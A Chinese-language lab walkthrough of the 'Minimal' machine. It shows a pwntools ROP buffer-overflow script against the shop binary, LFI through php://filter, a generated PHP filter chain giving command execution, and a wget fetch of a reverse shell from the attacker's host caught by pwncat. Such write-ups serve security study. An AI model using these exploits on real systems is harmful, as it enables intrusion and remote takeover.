question3\nbool question_3(void)\n{\n int32_t iVar1;\n char *s1;\n int64_t var_ch;\n\n puts("What is my favorite text editor?");\n fgets(&s1, 100, _stdin);\n var_ch._0_4_ = 6;\n secret_q3((char *)&s1, 6);\n iVar1 = strcmp(&s1, "hpok&qorn&vjsaohu\\n");\n if (iVar1 != 0) {\n puts("Nope!!");\n } else {\n puts("Correct!!");\n }\n return iVar1 == 0;\n}<\/code><\/pre>\n__int64 __usercall print_prize@<rax>(__int64 a1@<rbp>)\n{\n __int64 result; \/\/ rax\n __int64 v2; \/\/ [rsp-8h] [rbp-8h]\n\n __asm { endbr64 }\n v2 = a1;\n result = sub_4010F0("cat .\/prize.txt");\n if ( (_DWORD)result == -1 )\n result = sub_401100("Error");\n return result;\n}<\/code><\/pre>\n__int64 __fastcall secret_q3(__int64 a1, char a2)\n{\n __int64 result; \/\/ rax\n int v3; \/\/ [rsp-10h] [rbp-10h]\n signed int i; \/\/ [rsp-Ch] [rbp-Ch]\n\n __asm { endbr64 }\n v3 = sub_4010E0();\n for ( i = 0; ; ++i )\n {\n result = (unsigned int)(v3 - 1);\n if ( i >= (signed int)result )\n break;\n *(_BYTE *)(i + a1) ^= a2;\n }\n return result;\n}<\/code><\/pre>\n\u5927\u6982\u610f\u601d\u5c31\u662f\u56de\u7b54\u4e09\u4e2a\u95ee\u9898\uff0c\u90fd\u5bf9\u4e86\u5c31cat .\/prize.txt<\/code>\uff0c\u8fd9\u6b21\u7684IDA\u53cd\u7f16\u8bd1\u7684\u4e00\u5305\u6405\uff0c\u4e0a\u9762\u7684\u4ee3\u7801\u90e8\u5206\u662fIDA\uff0c\u90e8\u5206\u662fcutter\u7f16\u8bd1\u51fa\u6765\u7684\u3002<\/p>\n\u5c1d\u8bd5\u89e3\u5bc6<\/h3>\n\u7b2c\u4e00\u4e2a\u95ee\u9898\u7b54\u6848\u662flinux\u6beb\u65e0\u7591\u95ee<\/h4>\nlinux<\/code><\/pre>\n\u7b2c\u4e8c\u4e2a<\/h4>\n
\u770b\u8d77\u6765\u50cf\u662f\u51ef\u6492\u52a0\u5bc6\uff0c\u504f\u79fb\u91cf\u4e3a5<\/p>\n
<\/div><\/p>\nbacon pancakes<\/code><\/pre>\n\u7b2c\u4e09\u4e2a<\/h4>\n
\u770b\u90a3\u4e2asecret_q3<\/code>\uff0c\u50cf\u662f\u5728\u8fdb\u884cXOR\uff1a<\/p>\n<\/div><\/p>\n\u5f97\u5230\u7ed3\u679c\uff1a<\/p>\n
nvim with plugins<\/code><\/pre>\n\u65b9\u6cd5\u4e00\uff1a\u6784\u9020ROP\u94fe<\/h3>\n
\u672c\u9898\u4e0d\u5b58\u5728python\u65e0\u8bba\u662f2\u8fd8\u662f3\uff0c\u90fd\u6ca1\u6709\uff0c\u6211\u4eec\u5982\u679c\u60f3\u8981\u62ffpwntool\u53bb\u6253\uff0c\u53ea\u80fd\u9009\u62e9\u5c06\u5176\u6620\u5c04\u5230\u67d0\u4e2a\u7aef\u53e3\uff0c\u7136\u540e\u4ece\u672c\u5730\u4e3b\u673a\u53bb\u6253\uff1a<\/p>\n
socat tcp-l:\u7aef\u53e3\u53f7\uff0cfork exec:\u7a0b\u5e8f\u4f4d\u7f6e\uff0creuseaddr\n \u4f8b\u5982\uff1a\n socat tcp-l:6666,fork exec:.\/pwn,reuseaddr<\/code><\/pre>\n\u7136\u540e\u4f7f\u7528python\u53bb\u6253\uff01\u6211\u4eec\u5148\u4e0a\u4f20\u4e00\u4e2asocat\uff0c\u8d4b\u4e88\u5176\u6267\u884c\u6743\u9650\uff0c\u7136\u540e<\/p>\n
.\/socat TCP-LISTEN:8000 EXEC:'sudo \/opt\/quiz\/shop'<\/code><\/pre>\n\n\u6784\u9020ROP\u94fe\u662f\u6307\u5728\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u7684\u57fa\u7840\u4e0a\uff0c\u5229\u7528\u7a0b\u5e8f\u4e2d\u5df2\u6709\u7684\u5c0f\u7247\u6bb5\uff08gadgets\uff09\u6765\u6539\u53d8\u67d0\u4e9b\u5bc4\u5b58\u5668\u6216\u8005\u53d8\u91cf\u7684\u503c\uff0c\u4ece\u800c\u63a7\u5236\u7a0b\u5e8f\u7684\u6267\u884c\u6d41\u7a0b<\/strong>\u3002<\/p>\n<\/blockquote>\n\u67e5\u770b\u4e00\u4e0b\u6587\u4ef6\u7684\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/minimal]\n\u2514\u2500# file shop \nshop: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=c12ae144027d5fe72a74c6af34ff0619064a699f, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/minimal]\n\u2514\u2500# pwn checksec shop \n[*] '\/home\/kali\/temp\/minimal\/shop'\n Arch: amd64-64-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX enabled\n PIE: No PIE (0x400000)<\/code><\/pre>\n(remote) www-data@minimal:\/opt\/quiz$ cat \/proc\/sys\/kernel\/randomize_va_space \n2<\/code><\/pre>\n\u8bf4\u660e\u5f00\u542f\u4e86\u5730\u5740\u7a7a\u95f4\u5206\u5e03\u968f\u673a\u5316(ASLR)<\/code><\/p>\n\n\n- 0\uff0c\u5173\u95ed ASLR\uff0c\u6ca1\u6709\u968f\u673a\u5316\u3002\u6808\u3001\u5806\u3001.so \u7684\u57fa\u5730\u5740\u6bcf\u6b21\u90fd\u76f8\u540c\u3002<\/li>\n
- 1\uff0c\u666e\u901a\u7684 ASLR\u3002\u6808\u57fa\u5730\u5740\u3001mmap \u57fa\u5730\u5740\u3001.so \u52a0\u8f7d\u57fa\u5730\u5740\u90fd\u5c06\u88ab\u968f\u673a\u5316\uff0c\u4f46\u662f\u5806\u57fa\u5730\u5740\u6ca1\u6709\u968f\u673a\u5316\u3002<\/li>\n
- 2\uff0c\u589e\u5f3a\u7684 ASLR\uff0c\u5728 1 \u7684\u57fa\u7840\u4e0a\uff0c\u589e\u52a0\u4e86\u5806\u57fa\u5730\u5740\u968f\u673a\u5316\u3002<\/li>\n<\/ul>\n<\/blockquote>\n
\u5bfb\u627e\u504f\u79fb\u91cf<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/minimal]\n\u2514\u2500$ sudo chmod +x shop \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/minimal]\n\u2514\u2500$ gdb-peda shop\nReading symbols from shop...\n(No debugging symbols found in shop)\ngdb-peda$ pattern create 300\n'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%'\ngdb-peda$ run\nStarting program: \/home\/kali\/temp\/minimal\/shop \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library "\/lib\/x86_64-linux-gnu\/libthread_db.so.1".\nHey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.\nIf you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash\nWhat is my favorite OS?\nAAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%\n[----------------------------------registers-----------------------------------]\nRAX: 0x0 \nRBX: 0x7fffffffe358 --> 0x7fffffffe5f5 ("\/home\/kali\/temp\/minimal\/shop")\nRCX: 0x7ffff7ec1ba0 (<__GI___libc_write+16>: cmp rax,0xfffffffffffff000)\nRDX: 0x0 \nRSI: 0x4052a0 ("Nope!!\\n my favorite OS?\\nions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash\\n years.\\n")\nRDI: 0x7ffff7f9fa30 --> 0x0 \nRBP: 0x41414e4141384141 ('AA8AANAA')\nRSP: 0x7fffffffe208 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\nRIP: 0x40147d (<question_1+120>: ret)\nR8 : 0x0 \nR9 : 0x410 \nR10: 0x7ffff7de2e80 --> 0x10001a00007bf8 \nR11: 0x202 \nR12: 0x0 \nR13: 0x7fffffffe368 --> 0x7fffffffe612 ("SUDO_GID=1000")\nR14: 0x403e18 --> 0x401200 (<__do_global_dtors_aux>: endbr64)\nR15: 0x7ffff7ffd000 --> 0x7ffff7ffe2c0 --> 0x0\nEFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x401472 <question_1+109>: call 0x4010c0 <puts@plt>\n 0x401477 <question_1+114>: mov eax,0x0\n 0x40147c <question_1+119>: leave\n=> 0x40147d <question_1+120>: ret\n 0x40147e <question_2>: endbr64\n 0x401482 <question_2+4>: push rbp\n 0x401483 <question_2+5>: mov rbp,rsp\n 0x401486 <question_2+8>: add rsp,0xffffffffffffff80\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffe208 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0008| 0x7fffffffe210 ("AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0016| 0x7fffffffe218 ("AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0024| 0x7fffffffe220 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0032| 0x7fffffffe228 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0040| 0x7fffffffe230 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0048| 0x7fffffffe238 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0056| 0x7fffffffe240 ("AuAAXAAvAAYAAwAAZAAxAAy")\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x000000000040147d in question_1 ()\ngdb-peda$ pattern offset 0x000000000040147d\n4199549 not found in pattern buffer\ngdb-peda$ pattern search 0x7fffffffe208\nRegisters contain pattern buffer:\nRBP+0 found at offset: 112\nRegisters point to pattern buffer:\n[RSP] --> offset 120 - size ~79\nPattern buffer found at:\n0x004056b0 : offset 0 - size 300 ([heap])\n0x00007fffffffdf0f : offset 70 - size 17 ($sp + -0x2f9 [-191 dwords])\n0x00007fffffffe190 : offset 0 - size 199 ($sp + -0x78 [-30 dwords])\nReferences to pattern buffer found at:\n0x00007ffff7f9dab8 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007ffff7f9dac0 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007ffff7f9dac8 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007ffff7f9dad0 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007ffff7f9dad8 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007fffffffddc0 : 0x00007fffffffe190 ($sp + -0x448 [-274 dwords])\n0x00007fffffffddc8 : 0x00007fffffffe190 ($sp + -0x440 [-272 dwords])\n0x00007fffffffdde0 : 0x00007fffffffe190 ($sp + -0x428 [-266 dwords])<\/code><\/pre>\n\u504f\u79fb\u91cf\u4e3a120\uff01<\/p>\n
gadgets<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/minimal]\n\u2514\u2500$ ropper --search 'pop rdi' -f shop 2>\/dev\/null\n\n0x00000000004015dd: pop rdi; ret;<\/code><\/pre>\n\u67e5\u770b\u7cfb\u7edf\u8c03\u7528<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/minimal]\n\u2514\u2500$ objdump -D shop | grep system\n00000000004010f0 <system@plt>:\n 4010f4: f2 ff 25 35 2f 00 00 bnd jmp *0x2f35(%rip) # 404030 <system@GLIBC_2.2.5>\n 40124f: e8 9c fe ff ff call 4010f0 <system@plt><\/code><\/pre>\n\u5bfb\u627esh\u5730\u5740<\/h4>\ngdb-peda$ find sh\nSearching for 'sh' in: None ranges\nFound 123 results, display max 123 items:\n shop : 0x402070 --> 0x786a70666873 ('shfpjx')\n shop : 0x4021f5 --> 0x743b031b01006873 \n shop : 0x403070 --> 0x786a70666873 ('shfpjx')\n shop : 0x4031f5 --> 0x743b031b01006873 \n [heap] : 0x40531d ("sh\\n years.\\n")<\/code><\/pre>\n\u8fd9\u4fe9\u90fd\u662f0x4021f5<\/code>\u548c0x4031f5<\/code><\/p>\n\u7136\u540e\u5c1d\u8bd5\u7f16\u5199payload:<\/p>\n
from pwn import *\n\nr = remote('192.168.0.183', 8000)\n\njump = b"A"*120\nsystem_addr = p64(0x40124f)\npop_rdi = p64(0x4015dd)\nsh_addr = p64(0x4021f5)\n\npayload = jump + pop_rdi + sh_addr + system_addr \nr.sendline(payload)\nr.interactive()<\/code><\/pre>\n\u7136\u540e\u8fd0\u884c\u62ff\u5230shell\uff1a<\/p>\n
nmap -sCV -p 1-65535 172.20.10.6<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 d2:73:06:e2:e4:84:54:8c:42:0f:4e:81:7c:78:b9:c2 (ECDSA)\n|_ 256 75:a0:cf:35:61:a1:c8:77:cf:1a:cb:bc:6d:5b:49:75 (ED25519)\n80\/tcp open http Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n| http-cookie-flags: \n| \/: \n| PHPSESSID: \n|_ httponly flag not set\n|_http-title: Minimal Shop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nffuf -u http:\/\/172.20.10.6\/FUZZ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt <\/code><\/pre>\nimgs [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 0ms]\nstyles [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 0ms]\nserver-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 3ms]<\/code><\/pre>\nsudo dirsearch -u http:\/\/172.20.10.6\/ -e* -i 200,300-399 2>\/dev\/null<\/code><\/pre>\n[06:07:27] 302 - 0B - \/admin.php -> login.php\n[06:07:36] 200 - 0B - \/config.php\n[06:07:44] 200 - 450B - \/login.php\n[06:07:44] 302 - 0B - \/logout.php -> \/index.php\n[06:07:51] 200 - 427B - \/register.php\n[06:07:51] 200 - 12B - \/robots.txt\n[06:07:55] 301 - 311B - \/styles -> http:\/\/172.20.10.6\/styles\/<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u8e29\u70b9<\/h3>\nview-source:http:\/\/172.20.10.6\/robots.txt\ngood luck :)<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u6709\u4e00\u4e2a\u767b\u5f55\u9875\u9762\uff1a<\/p>\n
<\/div><\/p>\n\u4e07\u80fd\u5bc6\u7801\uff0c\u5f31\u5bc6\u7801\uff0c\u4f46\u662f\u6ca1\u6210\u529f\uff0c\u5c1d\u8bd5\u5fd8\u8bb0\u5bc6\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u6ce8\u518c\u4e00\u4e2a\u8d26\u53f7\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u829c\u6e56\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n
hack\nhack\nhack@hack.com<\/code><\/pre>\n\u767b\u5f55\u4e0a\u53bb\u4ee5\u540e\uff0c\u6dfb\u52a0\u4e24\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u70b9\u51fb\u8d2d\u4e70\uff1a<\/p>\n
<\/div><\/p>\n\u778e\u586b\u4e00\u4e0b\uff0c\u4f46\u662f\u6e05\u7a7a\u4ee5\u540e\u6ca1\u4e8b\u53d1\u751f\uff0c\u6ce8\u610f\u5230\u6b64\u65f6\u7684\u7f51\u5740\u4e3a\uff1a<\/p>\n
http:\/\/172.20.10.6\/shop_cart.php?action=buy<\/code><\/pre>\n\u5c1d\u8bd5\u4fee\u6539\u4e00\u4e0b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
http:\/\/172.20.10.6\/shop_cart.php?action=php:\/\/filter\/read=convert.base64-encode\/resource=index<\/code><\/pre>\n<\/div><\/p>\n<?php\n\nrequire_once ".\/config.php";\n\nsession_start();\n\n\/\/ Get products\n$query = $conn->prepare("SELECT * FROM products");\n$query->execute();\n$products = $query->get_result();\n\n$logged = false;\n\nif (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {\n $logged = true;\n}\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST') {\n if(isset($_POST["product_id"])){\n $_SESSION['cart'][] = $_POST["product_id"];\n }\n}\n?>\n\n<html lang="es">\n\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <link rel="stylesheet" href=".\/styles\/main.css">\n <title>Minimal Shop<\/title>\n<\/head>\n\n<body>\n <header>\n <div class="logo">\n <a href=".\/index.php">\n <h1>Minimal<\/h1>\n <\/a>\n <\/div>\n <\/div>\n <div class="boton-iniciar-sesion">\n <?php\n if ($logged) {\n echo '<a href="shop_cart.php">My cart<\/a>';\n echo '<a href="logout.php">Sign out<\/a>';\n } else {\n echo '<a href="login.php">Log In<\/a>';\n }\n ?>\n <\/div>\n <\/header>\n\n <main>\n <?php\n while ($fila = mysqli_fetch_assoc($products)) {\n $id = $fila['id'];\n $name = $fila['name'];\n $price = $fila['price'];\n $description = $fila['description'];\n $author = $fila['author'];\n\n echo '<form action="index.php" method="post">\n <div class="contenedor-producto">\n <div class="imagen-producto">\n <img src=".\/imgs\/' . $name . '.png" alt="Producto '.$id.'">\n <\/div>\n <div class="informacion-producto">\n <h2>' . $name . '<\/h2>\n <div class="descripcion">\n <p>Designer: ' . $author . '<\/p>\n <p>' . $description . '<\/p>\n <p>Price: $' . $price . '<\/p>\n <\/div>';\n if ($logged) {\n if (in_array($id, $_SESSION['cart'])) {\n echo '<p class="buy logtobuy">Added to cart<\/p>';\n }\n echo '<button class="buy button" type="submit" value="'. $id .'" name="product_id" >Buy<\/button>';\n } else {\n echo '<p class="buy logtobuy">Log In to buy<\/p>';\n }\n echo '\n <\/div>\n <\/div>\n <\/form>\n ';\n };\n ?>\n <\/main>\n<\/body>\n\n<\/html><\/code><\/pre>\nhttp:\/\/172.20.10.6\/shop_cart.php?action=php:\/\/filter\/read=convert.base64-encode\/resource=admin<\/code><\/pre>\n<\/div><\/p>\n\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
<?php\nrequire_once ".\/config.php";\n\nsession_start();\n\nif ($_SESSION['username'] !== 'admin') {\n header('Location: login.php');\n exit;\n}\n\n$logged = false;\n\nif (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {\n $logged = true;\n}\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST') {\n $nombre = $_POST['nombre'];\n $autor = $_POST['autor'];\n $precio = $_POST['precio'];\n $descripcion = $_POST['descripcion'];\n\n if (isset($_FILES['imagen'])) {\n $imagen = $_FILES['imagen'];\n if ($imagen['error'] === UPLOAD_ERR_OK) {\n $ruta_destino = '.\/imgs\/' . basename($imagen['name']);\n\n if (move_uploaded_file($imagen['tmp_name'], $ruta_destino)) {\n $query = $conn->prepare("INSERT INTO products (name, author, price, description) VALUES (?, ?, ?, ?)");\n $query->bind_param("ssds", $nombre, $autor, $precio, $descripcion);\n \/\/ Ejecutar la consulta\n if ($query->execute()) {\n echo "Uploaded";\n } else {\n echo "Error";\n }\n } else {\n \/\/"Error al subir la imagen.";\n echo "Error";\n }\n } else {\n echo "Error: " . $imagen['error'];\n }\n }\n}\n\n?>\n<!DOCTYPE html>\n<html>\n\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <link rel="stylesheet" href=".\/styles\/main.css">\n <link rel="stylesheet" href=".\/styles\/admin.css">\n <title>Minimal Shop<\/title>\n<\/head>\n\n<body>\n <header>\n <div class="logo">\n <a href=".\/index.php">\n <h1>Minimal<\/h1>\n <\/a>\n <\/div>\n <\/div>\n <div class="boton-iniciar-sesion">\n <?php\n if ($logged) {\n echo '<a href="logout.php">Cerrar Sesi\u00f3n<\/a>';\n echo '<a href="shop_cart.php">Mi Carrito<\/a>';\n } else {\n echo '<a href="login.php">Iniciar Sesi\u00f3n<\/a>';\n }\n ?>\n <\/div>\n <\/header>\n <h1>Admin Panel<\/h1>\n <div class="container">\n <h1>Add new Product<\/h1>\n <form action="admin.php" method="post" enctype="multipart\/form-data">\n <label for="nombre">Name:<\/label>\n <input type="text" name="nombre" id="nombre" required>\n\n <label for="autor">Author:<\/label>\n <input type="text" name="autor" id="autor" required>\n\n <label for="precio">Price:<\/label>\n <input type="number" name="precio" id="precio" required>\n\n <label for="descripcion">Description:<\/label>\n <textarea name="descripcion" id="descripcion" required><\/textarea>\n\n <label for="imagen">Img:<\/label>\n <input type="file" name="imagen" id="imagen" accept="image\/*" required>\n\n <input type="submit" value="Upload">\n <\/form>\n <\/div>\n\n<\/body>\n\n<\/html><\/code><\/pre>\n\u65b9\u6cd5\u4e00\uff1aphp_filter_chain_generator<\/h3>\npython php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'<\/code><\/pre>\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n\u8001\u6837\u5b50\uff0c\u8fdb\u884c\u8fde\u63a5\uff0c\u7136\u540e\u7ed9\u4e00\u4e2a\u53c2\u6570\uff0c\u4f20\u4e00\u4e2a\u53cd\u5f39shell\u8fc7\u53bb\uff0c\u5b8c\u6210RCE\u3002<\/p>\n
# kali\npython3 -m http.server 8888\n# minimal\nhttp:\/\/172.20.10.6\/shop_cart.php?action=payload&0=wget http:\/\/172.20.10.8:8888\/revershell.php<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u6210\u529f\u4e86\uff0c\u8fd0\u884c\u53cd\u5f39shell\uff1a<\/p>\n
# kali\nsudo pwncat-cs -lp 1234 2>\/dev\/null\n# minimal\nhttp:\/\/172.20.10.6\/shop_cart.php?action=payload&0=php revershell.php<\/code><\/pre>\n<\/div><\/p>\n\u5f39\u8fc7\u6765\u4e86\u3002<\/p>\n
\u65b9\u6cd5\u4e8c\uff1a\u91cd\u7f6e\u5bc6\u7801<\/h3>\n
\u7531\u4e8e\u6211\u4eec\u524d\u9762\u5f97\u5230\u7684 php \u6587\u4ef6\uff0c\u91cc\u9762\u7684\u5185\u5bb9GET\u5141\u8bb8\u6211\u4eec\u8fdb\u884cphp filter\u94fe\u6784\u9020\uff0c\u6211\u4eec\u53ef\u4ee5\u60f3\u5230\u4e4b\u524d\u6ca1\u6709\u8d77\u5230\u4f5c\u7528\u7684\u90a3\u4e2a\u5145\u503c\u5bc6\u7801\u7684\u754c\u9762\uff1a<\/p>\n
http:\/\/172.20.10.6\/reset_pass.php<\/code><\/pre>\n\u6211\u4eec\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u51fd\u6570\uff1a<\/p>\n
http:\/\/172.20.10.6\/shop_cart.php?action=php:\/\/filter\/read=convert.base64-encode\/resource=reset_pass<\/code><\/pre>\n<?php\nrequire_once ".\/config.php";\n\n$error = false;\n$done = false;\n$change_pass = false;\n\nsession_start();\n\n$username = null;\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST') {\n $username = $_POST['username'];\n\n $query = $conn->prepare("SELECT * FROM users WHERE user = ?");\n $query->bind_param("s", $username);\n\n $query->execute();\n $result = $query->get_result();\n\n if ($result->num_rows == 1) {\n while ($row = $result->fetch_assoc()) {\n $name = $row['user'];\n $randomNumber = rand(1, 100);\n $nameWithNumber = $name . $randomNumber;\n $md5Hash = md5($nameWithNumber);\n $base64Encoded = base64_encode($md5Hash);\n\n $deleteQuery = $conn->prepare("DELETE FROM pass_reset WHERE user = ?");\n $deleteQuery->bind_param("s", $name);\n $deleteQuery->execute();\n\n $insertQuery = $conn->prepare("INSERT INTO pass_reset (user, token) VALUES (?, ?)");\n $insertQuery->bind_param("ss", $name, $base64Encoded);\n\n if 